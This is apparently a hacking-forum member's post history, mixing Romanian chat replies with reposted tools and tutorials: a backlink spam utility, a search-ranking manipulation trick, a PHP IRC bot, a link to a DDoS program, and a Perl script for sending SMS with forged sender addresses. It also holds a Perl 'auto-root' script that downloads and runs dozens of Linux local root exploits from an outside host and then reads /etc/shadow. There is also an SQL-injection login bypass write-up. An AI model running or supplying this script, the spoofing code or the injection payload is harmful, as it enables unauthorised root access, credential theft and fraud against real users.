Gonzalez
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
[statBlaster 5.2]
Update 17: Improved Help
Revision 7: Quality Control
Last updated: February 13, 2010
Description
StatBlaster is a free utility that logs your site onto statistics/whois websites, generating backlinks along the way. To use StatBlaster:
1. Add or import the addresses of the websites you want to promote into the "Your Domains" list.
2. In the "Statistics Websites" box, enter the location of the file that contains the list of statistics websites you want to blast to. The websites should be separated by line and marked with for the location of your domain.
The download section also includes a list of 2,566 URLs prepared for StatBlaster.
StatBlaster is packed full of features:
* Import Websites: StatBlaster allows you to import a list of your websites to blast.
Finally, StatBlaster is available for free, which is hard to beat.
Includes: StatBlaster 5.2.exe; AutoHotkey.dll; libcurl.dll; urls.txt (Revision 7)
http://www.mediafire.com/?nxxt1z5ngl2
Version 5.2 (2/13/10): Integrated help now shows tooltips
Revision 7 (2/13/10): Quality control
Version 5.1 (2/7/10): Saves settings in configuration file; Faster performance
Revision 6 (2/7/10): Quality control
Version 4.2 (2/4/10): Integrated help through status bar; Proxy test; Improved performance
Version 4.1 (2/1/10): Proxy support; Wine Compatibility Mode removed
Revision 5 (1/31/10): Added experimental Alexa sites, courtesy of geteasymoneynow
Version 4.0 (1/30/10): New submission engine; Taskbar alert
Version 3.3 (1/29/10): Improved memory efficiency
Revision 4 (1/29/10): Merged list with new source, courtesy of SebastianJu
Revision 3 (1/29/10): Removed malware-infected sites, courtesy of SebastianJu
Version 3.1 (1/26/10): Customizable user agent; Efficiency fix
Revision 2 (1/18/10): Spam and duplicate links removed, courtesy of chowyoungfat
Version 2.0 (1/18/10): Multithreading supports up to 999 threads
Version 1.2 (1/16/10): Improved interface; Imports websites from .txt files
Revision 1 (1/10/10): New scrape of http://www.1347.com.cn/ with additional links from antx16
Revision 0 (11/22/09): Original release
Version 1.0 (11/22/09): Original release
The download comes with four files, each under a different license.
* libcurl.dll is released under a MIT/X derivative license.
* AutoHotkey.dll (source code) is released under the GNU General Public License, Version 2.0.
* urls.txt is released into the public domain.
Contact Sycthos via private message to negotiate commercial licensing of the StatBlaster executable.
http://www.virustotal.com/analisis/938fe43117c4d10bc4f8153d38ad5255e81c3ea9e18c5d6c85638eea5a27b765-1266081705
-
Author: newkid..
Here is my 2 cent
For one of my domain created one and a half months back, I was ranking good for specific searches. Say if I have reviewed any product, if you search for that product, I rank in the first page. Fair enough, but that does not bring massive traffic because I never did review based on product popularity, instead I just review what I find on my way and that too with no affiliate link and optimized only for adsense (getting 25% CTR ).
Lets be more specific, my domain relates to 'Make money online' and 'Work from home' and say I reviewed for website like 'sponsoredreviews', 'payperpost', 'mylot' etc. So if anyone search for these keyword, I always come in first page. I was quite satisfied because its a month old blog. But the click what I was getting is 100/day which was too dull for me. And for the main keyword like 'Make Money online' 'Work from home', 'Home based business'. 'make money guide, I was not ranking in the Top 100 (You know how competitive this keyword is)... And I did something which made my page to come in Top 50 in the first attempt and Top 10 in second attempt. Traffic surged from 100 /day to 3400/day on an average
I dont know if I can call it blackhat, but definitely not a white. Give a try for instant result....
what I did:
(1) I modified .htaccess file. At the bottom, I added
RewriteEngine On
RewriteBase /
RewriteRule ^(.+)$ / [R=302,L]
What it does is, it forward all the internal pages to homepage.. You type anything www.yourdomain.com/****/****.html and it will come to www.yourdomain.com
(2) Added one plain HTML page in root directory named 'index.html'
(3) Edited that index.html like this
a) Title - Your 2 anchor keyword
In the body, 2 lines of text filled with your main keyword in <h1> tagc) Search your keyword in google and pick any 3 result from top 10 result and copy the first para of each article
d) make this copied article in Bold
e) Add <h2> tag with your first Keyword
f) go to keyword tool in adword and type your main keyword and see all the relevant keyword coming into result. Note any 10 result (two short keyword, two 3/4 word keyword, six long tail keywords) and add these keywords under <h2> tag defined above and keep it in <h3> tag
g) Now repeat the steps (e) and (f) for your second Keyword (anchor text)
(4) Ping your blog through pingler and pingthatblog
(5) Leave it for a day
(6) after 24 hours, remove that added line in .htaccess file and rename or delete index.html file added into the root directory
-
Vezi ce face lacomia din om? Mai ales daca omu e american.
-Gonzalez
-
Interesant, mersi.
-Gonzalez
-
Hi there people, welcome back to another episode of coding in php with mrwutang
. How was Xmas? Hope yall had fun. Today we'll be learning how to build IRC bots in PHP.Whats and IRC bot and why would anyone use it?
IRC bots are scripts or programs that connects to an IRC server and acts like a client, the only difference is that it doesnt let the user interact with the server, it generates automated response or none at all according to what its builder, you want it to do. And ytf would anyone use it? Think about this scenario, you own an IRC server which is busy as shit, but you dont have the time to manage it or greet every user that visits it. Thats when our bot comes in. If you code it properly, it can do anything from greeeting each and every user, hosting text based games, quote jokes and facts, to moderating the server. A bot can also be used for malicious intents like flooding a channel. You could also make one cos it fun Cheesy. So lets get crackin, damn I like saying that
General purpose IRC commands:
NICK- Used to set your nick
. Usage- NICK <YourNickHere> \r\nPASS-Sets the password for your accound. Incase your IRC host needs it. For eg, NickServ needs you to provide a password for the nick you registered in. Usage- PASS <YourPassword> \r\n
USERNAME-Lets you set parameters like your real name domain name and things like that. I dont know much about this command. Usage- USERNAME <username> <domain> <name> <realname>. Just type your real name or nick for all these parameters. Sorry I cant give much info about this.
JOIN- You guessed it, lets you join a #channel. Usage- JOIN <#channelName>
PRIVMSG-Sends a message to a channel or user, Usage-PRIVMSG <#channelName/userName> <Message>
For more info visit RFC 1459
You gotta note that you should use the commands in the order when logging in PASS, USER and NICK. Because the protocol wants you to send it the PASS before username. You disobey it and the IRC police will be at your doorsteps before you can say Hamburger. Dont worry if you didnt understand anything I just said. Its all gonna make sense soon.
Functions we're gonna be using:
fsockopen()- Name says it all, opens a socket to read, write or both. Like fopen.
fwrite()-Writes to the fsockopen-ed socket. Some wise guy said everything in 'Nix is a file.
fgets()-Reads from the fsockopen-ed socket.
preg_match()-Regular expression. Matches text or patterns. We use it to get commands or messages from the server.
As usual Im gonna be posting the script and doing the explaining later.
<?php
$nick="Bot";
$name="Bot";
$pass="Password";
$irc="irc.evilzone.org";
$port=6667;
#chan="#evilzone";
$fp=fsockopen($irc,$port);
if($fp){
die("Couldnt connect to the server");
}
fwrite($fp,"PASS $pass\r\nUSER $name\r\nNICK $nick\r\nJOIN$chan\r\n");
while($msg=fgets($fp)){
if(preg_match("/:(.*)\!.*JOIN.*:#.*/",$msg,$usr)){
$usr=$usr[1];
fwrite($fp,"PRIVMSG $chan Hi $usr\r\n");
}
if(preg_match("/:(.*)\!.*PART|QUIT.*:.*/",$msg,$usr)){
$usr=$usr[1];
fwrite($fp,"PRIVMSG $chan Bye $usr\r\n");
}
if(preg_match("/:(.*)\!.*Hi $nick.*/",$msg,$usr)){
$usr=$usr[1];
fwrite($fp,"PRIVMSG $chan Hi $usr\r\n");
}
}
?>The bot in our example is pretty basic. It visits an IRC server specified in the variable $irc using password, nick and username stored in $pass,$user, and $nick and joins the channel specified in $chan. We use fsockopen, fwrite and fgets to open a socket to the server, send commands and read messages from the server. Our bot greets any user that greets the bot or joins or leaves the channel. See? Easy-Peasy.
We have the basic bot up and running now we can get it to do pretty much anything we want it to do.Use your new found powers wisely. Like that Spiderman's uncle said. With great power comes great responsibilities, Dont ask it to rob banks or take control of the world Tongue. Yea I got carried away I'll stop making lame jokes now Lips Sealed. Hope this article made s ense and you learned something. Message me if you didnt. Thanx for reading. Take care and have fun.
By mrwutang
-
-
Nu o sa faca publice experimentele lor niciodata, dupa parerea mea, suntem mai prosti toti (tot globu) decat americanii. Ei sunt cei mai cei, Area51, mare branza fata de ceea ce se intampla cu adevarat pe planeta. Daca is asa de Area51 ceva (o minune de-a lor) si sa opreasca incalzirea globala, Area51.
E adevarat ca daca treci "granita invizibila" te prind si te baga la bulau, dar ce sa facem, suntem inca prea prosti sa stim ce se petrece cu adevarat. Fiecare are o parere diferita. In fine, numa ma enervez. Dar subiectul e bun.
-Gonzalez
-
Cine face asemenea jocuri, e clar ca castiga. Indiferent pe ce plan.
-Gonzalez
-
Mai exista Romeo Fantastik? Maimuta cu ochelari! Am crezut ca sa evaporat de pe glob.
-Gonzalez
-
WTF is happening here?
-Gonzalez
-
Mai bine foloseste RoTLD - Romanian Top Level Domain, go sword are dreptate.
-Gonzalez
-
Inca se mai cumpara, dar nu vad un viitor stralucit artistilor romani si aici ma refer strict la genul hip-hop/rap.
-Gonzalez
-
Adult Affiliate Programs.
-Gonzalez
-
ADRIAN EFTIMIE - MIX (ONE FM ROMANIA - DANCE STATION)
-Gonzalez
-
Here is a short video on How to DDoS using a program script called “Good Bye v3? (which if you were to Google for, can be found all over the web).
http://www.youtube.com/watch?v=vA4FtpP6Lfs&feature=player_embedded
-
Tai Pan - ambele volume.
-Gonzalez
-
Din astea sunt multe lol.
-Gonzalez
-
Qlimax - The Prophet
-Gonzalez
-
No problem, bafta la el.
-Gonzalez
-
-
A simple perl program coded by me and smoking skull.
you can send free sms to vodafone IT Sim card
'njoy this
1. #usr/bin/perl
2.
3. #Descrizione: Smoking Sms Sender
4. #Autore: Smoking Skull && Spoof
5. #E-mail: priv.
6. #Sito: <a href="http://www.securityspl0its.com" target="_blank">www.securityspl0its.com</a> - sskull.wordpress.com
7.
8. use Net::SMTP;
9. use Tk;
10.
11.
12. $pl = rand(@rand);
13. $prov = \'smtp-sms.vodafone.it\';
14. $from = \'<gevw\'.\"$pl\".\'<a href="mailto:jkqcl@omnitel.it">jkqcl@omnitel.it</a>>\';
15. $in = \'<ukurswf.bs\'.\"$pl\".\'<a href="mailto:jbdsr@omnitel.it">jbdsr@omnitel.it</a>>\';
16. @rand =(\"a\",\"b\",\"v\",\"b\",\"n\",\"m\",\"l\",\"k\",\"j\",\"h\",\"g\",\"f\",\"d\",\"s\",\"s\",\"a\",\"p\",\"o\",\"i\",\"u\",\"y\",\"t\",\"r\",\"e\",\"w\",\"q\");
17.
18. $mw=MainWindow->new(-background=>\"black\");
19. $mw->title(\"Sms sender gratis to vodafone\");
20. $mw->minsize(270,200);
21. $mw->maxsize(270,200);
22. $mw->Label(-text=>\"Smoking Sms Sender by Smoking Skull\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");
23. $mw->Label(-text=>\"Inserisci il tuo nome o numero :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");
24. $mw->Entry(-textvariable=>\\$from1)->pack(-anchor=>\"n\");
25. $mw->Label(-text=>\"Inserire il numero del destinatario :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");
26. $mw->Entry(-textvariable=>\\$to)->pack(-anchor=>\"n\");
27. $mw->Label(-text=>\"Scrivere il messaggio da inviare :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");
28. $mw->Entry(-textvariable=>\\$mex)->pack(-anchor=>\"n\");
29.
30. $mw->Button(-text=>\"Invia\",-background=>\"black\",-foreground=>\"green\",-command=>sub{$sw=MainWindow->new(-background=>\"black\");
31.
32. $smtp = Net::SMTP->new(\"$prov\", Hello => \"provider\", Timeout => 50) || die \"[-]Socket error\\n\";
33. $smtp->mail(\"$from\") || die \"[-]Indirizzo di origine non valido\\n\";
34. $smtp->to(\"$to\".\'@sms.vodafone.it\') || die \"[-]La destinazione non è valida\\n\";
35. $smtp->data();
36. $smtp->datasend(\"Message-ID: $in\\n\");
37. $smtp->datasend(\"From: $from1 $from\\n\");
38. $smtp->datasend(\"To: $to\".\'@sms.vodafone.it\');
39. $smtp->datasend(\"\\nMime-Version: 1.0\\n\\n\");
40. $smtp->datasend(\"$mex\");
41. $smtp->datasend(\"\\n\");
42. $smtp->dataend();
43. $smtp->quit;
44.
45. $sw->title(\"Sms Sender : \");
46. $sw->minsize(200,20);
47. $sw->maxsize(200,20);
48. $sw->Label(-text=>\"Il messaggio è inviato.\",-background=>\"black\",-foreground=>\"Green\")->pack(-anchor=>\"n\");})->pack(-anchor=>\"n\");
49.
50. MainLoop; -
Guy who wrote this script pass away last week,just couple days after he release this scrpit.R.I.P. rock4eveR
#!/bin/perl
# Auto Rooting Script For Linux
# By: Rock4eveR
# Local Root 2006 2007 2008 2009 for Linux
# Usage: perl Auto-root.pl
# Version: 1.0
# Greetz to All SSTeam Members
#==========================================================
# _________ ____________________
# / _____/ / _____/\__ ___/____ _____ _____
# \_____ \ \_____ \ | | _/ __ \ \__ \ / \
# / \ / \ | | \ ___/ / __ \_| Y Y \
# /_______ //_______ / |____| \___ >(____ /|__|_| /
# \/ \/ \/ \/ \/
# Security Scene Team
#==========================================================
{
system("uname -a");
system("wget http://ssteam.pro.mk/localxpl/root.tgz");
system("tar zxvf root.tgz");
system("cd wunderbar_emporium ; chmod 755 wunderbar_emporium.sh ; ./wunderbar_emporium.sh");
system("id");
system("cat /proc/sys/vm/mmap_min_addr");
print "Please Wait ...";
system("wget http://ssteam.pro.mk/localxpl/therebel.tgz");
system("tar zxvf therebel.tgz");
system("cd therebel ; chmod 777 therebel.sh ; ./therebel.sh");
system("id");
print "Please Wait ...";
system("wget http://ssteam.pro.mk/localxpl/local-root-exploit-gayros.c");
system("gcc -o gayros local-root-exploit-gayros.c");
system("chmod 777 gayros");
system("./gayros");
system("id");
system("wget http://ssteam.pro.mk/localxpl/vmsplice-local-root-exploit.c");
system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c");
system("chmod 777 vmsplice-local-root-exploit");
system("./vmsplice-local-root-exploit");
system("id");
system("wget http://ssteam.pro.mk/localxpl/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
system("wget http://ssteam.pro.mk/localxpl/xpl");
system("chmod 777 xpl");
system("./xpl");
system("id");
system("wget http://ssteam.pro.mk/localxpl/boo");
system("chmod 777 boo");
system("./boo");
system("id");
system("wget http://ssteam.pro.mk/localxpl/100");
system("chmod 777 100");
system("./100");
system("id");
system("wget http://ssteam.pro.mk/localxpl/101");
system("chmod 777 101");
system("./101");
system("id");
system("wget http://ssteam.pro.mk/localxpl/102");
system("chmod 777 102");
system("./102");
system("id");
system("wget http://ssteam.pro.mk/localxpl/103");
system("chmod 777 103");
system("./103");
system("id");
system("wget http://ssteam.pro.mk/localxpl/106");
system("chmod 777 106");
system("./106");
system("id");
system("wget http://ssteam.pro.mk/localxpl/107");
system("chmod 777 107");
system("./107");
system("id");
system("wget http://ssteam.pro.mk/localxpl/108");
system("chmod 777 108");
system("./108");
system("id");
system("wget http://ssteam.pro.mk/localxpl/109");
system("chmod 777 109");
system("./109");
system("id");
system("wget http://ssteam.pro.mk/localxpl/11");
system("chmod 777 11");
system("./11");
system("id");
system("wget http://ssteam.pro.mk/localxpl/110");
system("chmod 777 110");
system("./1110");
system("id");
system("wget http://ssteam.pro.mk/localxpl/111");
system("chmod 777 111");
system("./111");
system("id");
system("wget http://ssteam.pro.mk/localxpl/112");
system("chmod 777 112");
system("./112");
system("id");
system("wget http://ssteam.pro.mk/localxpl/114");
system("chmod 777 114");
system("./114");
system("id");
system("wget http://ssteam.pro.mk/localxpl/115");
system("chmod 777 115");
system("./115");
system("id");
system("wget http://ssteam.pro.mk/localxpl/116");
system("chmod 777 116");
system("./116");
system("id");
system("wget http://ssteam.pro.mk/localxpl/117");
system("chmod 777 117");
system("./117");
system("id");
system("wget http://ssteam.pro.mk/localxpl/118");
system("chmod 777 118");
system("./118");
system("id");
system("wget http://ssteam.pro.mk/localxpl/119");
system("chmod 777 119");
system("./119");
system("id");
system("wget http://ssteam.pro.mk/localxpl/12");
system("chmod 777 12");
system("./12");
system("id");
system("wget http://ssteam.pro.mk/localxpl/120");
system("chmod 777 120");
system("./120");
system("id");
system("wget http://ssteam.pro.mk/localxpl/13");
system("chmod 777 13");
system("./13");
system("id");
system("wget http://ssteam.pro.mk/localxpl/14");
system("chmod 777 14");
system("./14");
system("id");
system("wget http://ssteam.pro.mk/localxpl/15");
system("chmod 777 15");
system("./15");
system("id");
system("wget http://ssteam.pro.mk/localxpl/16");
system("chmod 777 16");
system("./16");
system("id");
system("wget http://ssteam.pro.mk/localxpl/17");
system("chmod 777 17");
system("./17");
system("id");
system("wget http://ssteam.pro.mk/localxpl/18");
system("chmod 777 18");
system("./18");
system("id");
system("wget http://ssteam.pro.mk/localxpl/19");
system("chmod 777 19");
system("./19");
system("id");
system("wget http://ssteam.pro.mk/localxpl/2");
system("chmod 777 2");
system("./2");
system("id");
system("wget http://ssteam.pro.mk/localxpl/20");
system("chmod 777 20");
system("./20");
system("id");
system("wget http://ssteam.pro.mk/localxpl/21");
system("chmod 777 21");
system("./21");
system("id");
system("wget http://ssteam.pro.mk/localxpl/22");
system("chmod 777 22");
system("./22");
system("id");
system("wget http://ssteam.pro.mk/localxpl/23");
system("chmod 777 23");
system("./23");
system("id");
system("wget http://ssteam.pro.mk/localxpl/24");
system("chmod 777 24");
system("./24");
system("id");
system("wget http://ssteam.pro.mk/localxpl/3");
system("chmod 777 3");
system("./3");
system("id");
system("wget http://ssteam.pro.mk/localxpl/4");
system("chmod 777 4");
system("./4");
system("id");
system("wget http://ssteam.pro.mk/localxpl/45");
system("chmod 777 45");
system("./45");
system("id");
system("wget http://ssteam.pro.mk/localxpl/47");
system("chmod 777 47");
system("./47");
system("id");
system("wget http://ssteam.pro.mk/localxpl/5");
system("chmod 777 5");
system("./5");
system("id");
system("wget http://ssteam.pro.mk/localxpl/50");
system("chmod 777 55");
system("./55");
system("id");
system("./55");
system("id");
system("wget http://ssteam.pro.mk/localxpl/51");
system("chmod 777 51");
system("./51");
system("id");
system("wget http://ssteam.pro.mk/localxpl/52");
system("chmod 777 52");
system("./52");
system("id");
system("wget http://ssteam.pro.mk/localxpl/53");
system("chmod 777 53");
system("./53");
system("id");
system("wget http://ssteam.pro.mk/localxpl/54");
system("chmod 777 54");
system("./54");
system("id");
system("wget http://ssteam.pro.mk/localxpl/55");
system("chmod 777 55");
system("./55");
system("id");
system("wget http://ssteam.pro.mk/localxpl/6");
system("chmod 777 6");
system("./6");
system("id");
system("wget http://ssteam.pro.mk/localxpl/61");
system("chmod 777 61");
system("./61");
system("id");
system("wget http://ssteam.pro.mk/localxpl/62");
system("chmod 777 62");
system("./62");
system("id");
system("wget http://ssteam.pro.mk/localxpl/63");
system("chmod 777 63");
system("./63");
system("id");
system("wget http://ssteam.pro.mk/localxpl/64");
system("chmod 777 64");
system("./64");
system("id");
system("wget http://ssteam.pro.mk/localxpl/65");
system("chmod 777 65");
system("./65");
system("id");
system("wget http://ssteam.pro.mk/localxpl/7");
system("chmod 777 7");
system("./7");
system("id");
system("wget http://ssteam.pro.mk/localxpl/70");
system("chmod 777 70");
system("./70");
system("id");
system("wget http://ssteam.pro.mk/localxpl/71");
system("chmod 777 71");
system("./71");
system("id");
system("wget http://ssteam.pro.mk/localxpl/72");
system("chmod 777 72");
system("./72");
system("id");
system("wget http://ssteam.pro.mk/localxpl/73");
system("chmod 777 73");
system("./73");
system("id");
system("wget http://ssteam.pro.mk/localxpl/74");
system("chmod 777 74");
system("./74");
system("id");
system("wget http://ssteam.pro.mk/localxpl/75");
system("chmod 777 75");
system("./75");
system("id");
system("wget http://ssteam.pro.mk/localxpl/76");
system("chmod 777 76");
system("./76");
system("wget http://ssteam.pro.mk/localxpl/77");
system("chmod 777 77");
system("./77");
system("id");
system("wget http://ssteam.pro.mk/localxpl/78");
system("chmod 777 78");
system("id");
system("wget http://ssteam.pro.mk/localxpl/79");
system("chmod 777 79");
system("./79");
system("id");
system("wget http://ssteam.pro.mk/localxpl/8");
system("chmod 777 8");
system("./8");
system("id");
system("wget http://ssteam.pro.mk/localxpl/80");
system("chmod 777 80");
system("./80");
system("id");
system("wget http://ssteam.pro.mk/localxpl/81");
system("chmod 777 81");
system("./81");
system("id");
system("wget http://ssteam.pro.mk/localxpl/82");
system("chmod 777 82");
system("./82");
system("id");
system("wget http://ssteam.pro.mk/localxpl/83");
system("chmod 777 83");
system("./83");
system("id");
system("wget http://ssteam.pro.mk/localxpl/84");
system("chmod 777 84");
system("./84");
system("id");
system("wget http://ssteam.pro.mk/localxpl/85");
system("chmod 777 85");
system("./85");
system("id");
system("wget http://ssteam.pro.mk/localxpl/86");
system("chmod 777 86");
system("./86");
system("id");
system("wget http://ssteam.pro.mk/localxpl/87");
system("chmod 777 87");
system("./87");
system("id");
system("wget http://ssteam.pro.mk/localxpl/88");
system("chmod 777 88");
system("./88");
system("id");
system("wget http://ssteam.pro.mk/localxpl/89");
system("chmod 777 89");
system("./89");
system("id");
system("wget http://ssteam.pro.mk/localxpl/9");
system("chmod 777 9");
system("./9");
system("id");
system("wget http://ssteam.pro.mk/localxpl/90");
system("chmod 777 90");
system("./90");
system("id");
system("wget http://ssteam.pro.mk/localxpl/91");
system("chmod 777 91");
system("./91");
system("id");
system("wget http://ssteam.pro.mk/localxpl/92");
system("chmod 777 92");
system("./92");
system("id");
system("wget http://ssteam.pro.mk/localxpl/93");
system("chmod 777 93");
system("./93");
system("id");
system("wget http://ssteam.pro.mk/localxpl/94");
system("chmod 777 94");
system("./94");
system("id");
system("wget http://ssteam.pro.mk/localxpl/96");
system("chmod 777 96");
system("./96");
system("id");
system("wget http://ssteam.pro.mk/localxpl/97");
system("chmod 777 97");
system("./97");
system("id");
system("wget http://ssteam.pro.mk/localxpl/99");
system("chmod 777 99");
system("./99");
system("id");
system("whoami");
system("cat /etc/shadow");
print "Last Edit By: Rock4eveR";
print "[ http://ssteam.ws ]";
} -
Author: Wildhoney
I sat down with a friend today and spent a good 5 hours attempting to breach the security of an unnamed website. The website in question is a rather popular website with an Alexa ranking of just over 3,000. I've always been of the opinion that esoteric knowledge is only esoteric because the individuals wish to make it that way. Governmental procedures, for instance, are very esoteric. Unless you're actually there, the procedures are well over many individuals' head. If you can decipher the language used most people can understand it.
This is where I'd like to sit down with everyone at TalkPHP and explain in simple terms how I did it, the reasons why and what you can do to prevent this from happening to you.
Note: Although we successfully hacked the target site, no core information was gathered and no harmful information was injected. The administrators of the site were notified and advised on how to patch the vulnerability.
This breach of security involved the common security method, SQL injection. Now, I've used the unnamed site on numerous occasions for various reasons that I'm not going to mention. All perfectly innocuous. However, from using the website off and on I noticed many security issues that were arising from normal use. Today was the day I decided to put theory into practice.
I already had an account and so I attempted to login to my account using the following:
Username: Wildhoney
Password: ' OR 1=1
What that essentially says is take the user name, Wildhoney, and then attempt to issue my own SQL. If you think that the normal query would be like so:
SELECT
myUsername,
myPassword
FROM
myTable
WHERE
myUsername = 'Wildhoney'
AND
myPassword = 'myPassword'Then terminating the SQL just after the = ' would end the normal SQL and allow me to enter raw SQL commands. Thanks to our SQL injection the query would look like so:
SELECT
myUsername,
myPassword
FROM
myTable
WHERE
myUsername = 'Wildhoney'
AND
myPassword = '' OR 1=1As you can clearly see from there, the SQL has been significantly modified to to make the end part of the SQL say the following in pseudo terms: AND the field myPassword equals NULL OR 1 equals 1. As 1 will always equal 1 we can successfully login.
However, on this website there is more code at the end of the SQL making our MySQL statement now make absolutely no sense. The solution for this is MySQL comments! A comment will comment out any code we do not want. In this case, the code after our OR 1=1. First up was the -- comment block. However, -- only comments single lines and after that didn't work we deduced the site must have been using multiple SQL lines. Step in /*. Once that had been issued MySQL ignored everything after our OR 1=1 and the login was successful.
Note: Although we logged into our own user name, absolutely any user name on the site could have been accessed.
I presume that many individuals are asking "why?". This wasn't a case of boosting our ego or bragging rights. Rather, education. Although we did a lot more after the login attempt, nothing harmless in the least, the login attempt is perhaps 1 of the most vulnerable part to any website and I felt was worth mentioning to everyone on TalkPHP to stop them making the same mistakes in their code.
For the login attempt, the code was not complex nor was it tricky to construct. We successfully logged into our account without specifying the correct password after about the 5th attempt. A little research was required before logging in but after that, the world is yours (Or, ours).
The way to protect yourself against something like that is just so simple. You should escape all single quotes, as well as check the data using a type specifier. See our article on sprintf.
-
Step 1- Installing Ruby on Rails
Installing Ruby on Rails (also often shortened to RoR) is fairly painless on most systems, but you will need to be comfortable opening up the terminal. The Ruby on Rails download page provides links to get started, and I will reproduce them here to save you a bit of time. Just as a note, these are the places to get Ruby, which is what Rails is programmed in, and we will be installing Rails in a minute. To learn more about the language, review the Ruby site
* Windows: One-Click Ruby Installer (I recommend using 1.8.6-26 Final Release)
* Mac OS X 10.4: Ships with broken Ruby but you can follow the amazing guide by Dan Benjamin
* Mac OS X 10.5: If you install the Developer Tools from Apple you will be set. Try either your installation discs or Apple's Developer Site and download Xcode
* Linux: While this may vary for each distribution, you will need to install ruby, irb, & rdoc
Now that we've downloaded Ruby, make sure you have RubyGems, which is a package manager for Ruby.
To test if you have RubyGems, run the following in terminal:
gem -v
As of this writing, 1.3.2 is the latest version. To update if you don't have the latest version, run the following, and if you are on a Mac, put sudo in the front.
gem update --system
If you won't be using RubyGems, follow these steps:
1. Download the latest release of RubyGems here.
2. Extract the package
3. Change into the directory in your terminal (cd is the command)
4. Run this in the terminal: ruby setup.rb (Add sudo in front of the command for Linux & Mac OS X users, you will also need to continue that for all gem install commands)
If you have a Linux system, you should be able to install RubyGems through your package manager, but I prefer the method above. If you have any more problems, check out the installation documentation at the RubyGems site.
Installing Rails
Now that we have the latest version of RubyGems, let's install Rails:
gem install rails
It will take a few minutes to install Rails and all of its' dependancies.
Step 2 - Creating an Application
So now that we have Ruby, RubyGems, and Rails installed, let's create a project! To create a new project, you will use the Rails command to create new projects. We will create a simple project named "blog." Note: This will create the app folder in the current directory you are in terminal, so make sure you change into the directory you want the app to be stored in.
rails blog
You should see something like this fly by:
Next, open the project in your favorite text editor/IDE. I personally love TextMate, -while only for Mac OS X, there are some great clones which are also available.
Folder Structure
The folder structure of a Ruby on Rails will look similar to the following:
There are three folders any developer or designer will need to work with on a daily basis: the app, config, and public folders. Please review the short explanations for each of the folders:
* app: This is where your application's logic lives.
o controllers: This is where Rails looks for the controller classes. In short, these receive the requests.
o helpers: Helpers live in this directory and assist the controllers, models, and views
o models: Each of these basically represents a table in the database, so finding information and setting up your application is dead simple
o views: what the user sees
+ layouts: these are each of the layouts you can define a controller to use. Makes templating very easy.
+ all the other ones: While in our application we currently don't have any, each of the other folders that will be in this folder represent and relate back to the controllers, and the files that will be in here correspond to the actions in the controller
* config: This folder holds all of your app's settings. Some specific files:
o database.yml: This file holds your database settings
o environment.rb: This file holds the Rails settings for your application
o environements/: This folder holds the configuration settings for each of the specific environments: development, test, and production
o routes.rb: This file holds the settings for the URL schema, as well as specific URL and where to send the requests
* db: This folder will end up holding your database (if you use sqllite), your database schema, and all of your database migrations (changes to the structure)
* doc: This folder will hold all of the documentation generated by rake doc:app
* lib: The files in here contain application specific code that doesn't belong in your controllers.
* log: Rails stores the logs in here, four of them. One for server specific stuff in server.log, and one for each environments.
* public: This folder contains all of the files that will not change as much. Rails looks for files her before trying to go to a controller. Javascripts are stored in the javascripts folder, images in the images folder, and stylesheets in the stylesheets folder. Static files like robots.txt and other html files can also be stored here. Make sure you delete the index.html file because that will show up instead of what you want!
* script: These scripts make your life a whole lot easier. The server script launches the development web server, and generate generates code.
* test: The tests you write and the ones Rails creates for you are all stored here.
* tmp: Rails stores any temporary files here.
* vendor: Here you can install any Rails plugins (or libraries) made by third-parties that do not come default with the Rails distribution.
Step 3 - Getting your Hands Dirty
While the purpose of this tutorial is not to create an application, we will still do a bit of programming. Let's first create a controller named articles: (Make sure you have changed into the root of the Rails application)
script/generate controller articles
Now open up the file, and you should see this:
view plaincopy to clipboardprint?
class ArticlesController < ApplicationController
endAll this code says is that we are defining a new class called ArticlesController that inherits from another class called ApplicationController. Now, we are going to create an action (referred to as a method strictly speaking in Ruby) name index, so when you go to http://localhost:3000/articles/ you will be shown something. Change your code so it looks like:
view plaincopy to clipboardprint?
class ArticlesController < ApplicationController
def index
end
endSo now that we have an action, go to the app/views folder. We are going to create a view so when a user requests that URL, they actually see something. You may have noticed that there is a new folder in here named articles; this folder was created when we generated the controller. So, make a new file in the articles folder named index.html.erb. You may ask about the ending, the html refers to the type of file, and the erb refers to embedded Ruby as the templating engine. I personally prefer rhtml as it is a single ending, but that will be depreciated in Rails 3, which is planned to be released at RailsConf this summer. Put this into your new file:
The time now is <%= Time.now %>
The <%= %> tags may intrigue you. This tag is meant so that Ruby ouputs the results of the enclosed Ruby code. So this code will print the Time now. The other tag you will use in Rails is simply <%- -%>. This tag is meant for Ruby code that doesn't actually output anything, such as when repeating through items in an array.
Now we are going to create a layout to make this text beautiful. So create a file in the views/layouts directory named application.html.erb with the following in it:
view plaincopy to clipboardprint?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title><%= h(@title) %></title>
<%= stylesheet_link_tag 'application' %>
<%= javascript_include_tag 'prototype' %>
<%= yield(:head) %>
</head>
<body>
<div id="container">
<%- flash.each do |name, msg| -%>
<%= content_tag :div, msg, :id => "flash_#{name}" %>
<%- end -%>
<%= yield %>
</div>
</body>
</html>First, before I explain the code, I do want you to know why we named the file application.html.erb. Rails will automatically load this layout every time unless otherwise specified. If you had named this layout "layout" then you would have had to add layout :layout to the top of the controller. This block of code has some important tidbits that you will want to know for when you are developing layouts.
* <%= stylesheet_link_tag 'application' %>: This tag generate the CSS inclusion tag for the CSS file named application.css
* <%= javascript_include_tag 'prototype' %>: This tag generates the Javascript inclusion tag for the Prototype javascript library. Prototype is the default javascript library that comes with Rails. You can also put :defaults (not in single quotes) instead of just prototype and Rails will load all of the defaults, :all would load all files in the public/javascripts folder.
* <%- flash.each do |name, msg| -%>: This code and the code in the block means that for every item in the flash array, it will show a message to the the user.
* <%= yield %>: This outputs all of the info from the individual view, and outputs in inside the template and sends this to the user.
Now, let's create a quick CSS file, named application.css in public/stylesheets, and put the following in it:
view plaincopy to clipboardprint?
body {
background-color: #111;
font-family: Verdana, Helvetica, Arial;
font-size: 14px;
}
#container {
width: 75%;
margin: 0 auto;
background-color: #FFF;
